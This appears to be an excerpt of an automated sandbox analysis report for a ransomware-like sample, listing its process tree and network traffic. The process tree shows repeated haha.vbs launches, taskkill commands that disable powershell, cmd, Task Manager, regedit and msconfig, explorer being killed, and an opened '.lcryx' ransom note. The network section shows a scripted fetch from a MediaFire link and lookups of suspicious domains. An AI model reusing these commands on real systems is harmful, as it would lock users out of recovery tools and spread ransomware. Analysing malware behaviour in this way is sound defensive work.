        374⤵
        
        PID:18056
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        375⤵
        
        PID:18136
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        376⤵
        
        PID:18208
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        377⤵
        
        PID:18308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        378⤵
        
        PID:18384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        379⤵
        
        PID:9564
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        380⤵
        
        PID:10852
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        381⤵
        
        PID:17756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        382⤵
        
        PID:10464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        383⤵
        
        PID:6116
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        384⤵
        
        PID:18020
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        385⤵
        
        PID:11256
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        386⤵
        
        PID:18268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        387⤵
        
        PID:18380
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        388⤵
        
        PID:17744
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        389⤵
        
        PID:18396
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        390⤵
        
        PID:16564
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        391⤵
        
        PID:17628
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        392⤵
        
        PID:11548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        393⤵
        
        PID:16756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        394⤵
        
        PID:16860
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        395⤵
        
        PID:17968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        396⤵
        
        PID:1268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        397⤵
        
        PID:16988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        398⤵
        
        PID:1844
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        399⤵
        
        PID:18416
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        400⤵
        
        PID:16144
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        401⤵
        
        PID:16248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        402⤵
        
        PID:8812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        403⤵
        
        PID:16432
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        404⤵
        
        PID:536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        405⤵
        
        PID:3112
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        406⤵
        
        PID:17400
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        407⤵
        
        PID:17228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        408⤵
        
        PID:15868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        409⤵
        
        PID:6404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        410⤵
        
        PID:6548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        411⤵
        
        PID:6408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        412⤵
        
        PID:15980
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        413⤵
        
        PID:18504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        414⤵
        
        PID:18592
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" C:\Windows\System32\wins32bugfix.vbs
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3476
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:284
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4848
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5532
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3260
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6452
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6844
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:8368
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:8576
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:8752
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:8940
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:9132
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:8480
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:5392
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:10700
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:10872
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:11120
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:11260
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:10936
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:6140
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:2356
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:12576
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:12744
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:12920
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:13060
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:13236
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:12652
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:12920
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:14120
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:14300
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:8444
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:8820
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:9332
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:8444
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:9956
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:10464
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:2280
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:11340
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      PID:14844
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:5268
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:12168
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:4532
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:16344
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:12900
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      PID:7952
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:15980
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:13340
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:8932
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:15836
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:10856
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:8528
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:15276
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:15116
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:15064
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:964
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:16428
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      Kills process with taskkill
      PID:1132
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:12552
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:16916
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:16108
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:16420
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:12700
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:5196
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:17596
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      PID:17856
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:18016
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:18200
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:18368
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:15224
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM msconfig.exe /F
      4⤵
      Kills process with taskkill
      PID:17968
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
      4⤵
      PID:16296
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
      4⤵
      PID:11728
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
      4⤵
      Kills process with taskkill
      PID:15880
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
      4⤵
      Kills process with taskkill
      PID:7044
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM control.exe /F
      4⤵
      Kills process with taskkill
      PID:7164
  - - C:\Windows\System32\taskkill.exe
      "C:\Windows\System32\taskkill.exe" /IM gp.exe /F
      4⤵
      Kills process with taskkill
      PID:18584
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3736
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\CheckpointConfirm.dwg.lcryx
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:18496

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4344

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1176

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5708

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6084

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3a4 0x244
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6972

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5764

Network

DNS

www.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

172.217.169.36
GET

http://www.google.com/

wscript.exe

Remote address:

172.217.169.36:80

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.google.com

Response

HTTP/1.1 200 OK

Date: Fri, 25 Oct 2024 15:13:35 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-5P38wQAGHHGh-FuFU7OX-w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVYB7cr6tvOhMigCpyjFx2FvnfP9kuleBcoQUUl9cXa4hgSu7dzAcxYiFeI; expires=Wed, 23-Apr-2025 15:13:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
DNS

www.mediafire.com

wscript.exe

Remote address:

8.8.8.8:53

Request

www.mediafire.com

IN A

Response

www.mediafire.com

IN A

104.17.151.117

www.mediafire.com

IN A

104.17.150.117
GET

https://www.mediafire.com/view/6rgzengdbh7mga3/Background.jpg/file

wscript.exe

Remote address:

104.17.151.117:443

Request

GET /view/6rgzengdbh7mga3/Background.jpg/file HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: www.mediafire.com

Response

HTTP/1.1 200 OK

Date: Fri, 25 Oct 2024 15:13:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 8d8326c8ce056343-LHR
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, post-check=0, pre-check=0
Expires: 0
Set-Cookie: ukey=rgcsnx6lpqotb2x778yv800o3syiabui; expires=Tue, 25-Oct-2044 15:13:36 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
Strict-Transport-Security: max-age=0
Pragma: no-cache
access-control-allow-methods: OPTIONS, POST, GET
alt-svc: h3=":443"; ma=86400
content-security-policy: frame-ancestors *.mediafire.com
x-frame-options: SAMEORIGIN
x-mf-env: liveApi
x-mf-fe: mf2
Set-Cookie: __cf_bm=w1DHeYFdMEYRKTL5qlWQC4odBxq38GyLqAGui84P7DI-1729869216-1.0.1.1-vOEZnV0Se4ic31TElfdyRbLwVk_VRKMjpyZJl52nkeyouO_zQzg..Sjtb5FFXSd7KeUXGKQY0mqRi8BHYWRmwA; path=/; expires=Fri, 25-Oct-24 15:43:36 GMT; domain=.mediafire.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
DNS

98.209.201.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

98.209.201.84.in-addr.arpa

IN PTR

Response
DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

117.151.17.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

117.151.17.104.in-addr.arpa

IN PTR

Response
DNS

20.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

167.57.26.184.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.57.26.184.in-addr.arpa

IN PTR

Response

167.57.26.184.in-addr.arpa

IN PTR

a184-26-57-167deploystaticakamaitechnologiescom
DNS

languishcharmingwidely.com

msedge.exe

Remote address:

8.8.8.8:53

Request

languishcharmingwidely.com

IN A

Response

languishcharmingwidely.com

IN A

192.243.59.13

languishcharmingwidely.com

IN A

192.243.61.227

languishcharmingwidely.com

IN A

172.240.108.76

languishcharmingwidely.com

IN A

192.243.61.225

languishcharmingwidely.com

IN A

172.240.127.234

languishcharmingwidely.com

IN A

192.243.59.20

languishcharmingwidely.com

IN A

192.243.59.12

languishcharmingwidely.com

IN A

172.240.253.132

languishcharmingwidely.com

IN A

172.240.108.84

languishcharmingwidely.com

IN A

172.240.108.68
DNS

www.msnsndstdyyemkemafgk.dns.army

msedge.exe

Remote address:

8.8.8.8:53

Request

www.msnsndstdyyemkemafgk.dns.army

IN A

Response
GET

https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js

msedge.exe

Remote address:

192.243.59.13:443

Request

GET /22/f4/31/22f431404146fb2f892b30f7d213aea4.js HTTP/1.1
Host: languishcharmingwidely.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 403 Forbidden

Server: nginx/1.19.5
Date: Fri, 25 Oct 2024 15:13:42 GMT
Content-Type: application/javascript
Content-Length: 0
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Access-Control-Allow-Origin: *
Accept-CH: Device-Stock-UA,Sec-CH-UA,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-PlatformUser-Agent,User-Agent,X-Device-User-Agent,X-OperaMini-Phone-UA,X-UCBrowser-Device-UA
Host: languishcharmingwidely.com
DNS

www.youtube.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

172.217.169.46
DNS

google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

172.217.16.238
DNS

google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

google.com

IN A

Response

google.com

IN A

172.217.16.238
GET

http://www.youtube.com/

msedge.exe

Remote address:

216.58.204.78:80

Request

GET / HTTP/1.1
Host: www.youtube.com
Connection: keep-alive
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 301 Moved Permanently

Content-Type: application/binary
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 25 Oct 2024 15:13:42 GMT
Location: https://www.youtube.com/
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
GET

https://www.youtube.com/

msedge.exe

Remote address:

216.58.204.78:443

Request

GET / HTTP/2.0
host: www.youtube.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/desktop_polymer.vflset/desktop_polymer.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/desktop_polymer.vflset/desktop_polymer.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.youtube.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: YSC=SkIZ0LuUwJA
cookie: __Secure-YEC=CgtFYWJKeEY1VjZDNCin6-64BjIKCgJHQhIEGgAgTw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgTw%3D%3D
GET

https://www.youtube.com/s/desktop/d7bac1f2/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js

msedge.exe

Remote address:

216.58.204.78:443

Request

GET /s/desktop/d7bac1f2/jsbin/web-animations-next-lite.min.vflset/web-animations-next-lite.min.js HTTP/2.0
host: www.youtube.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
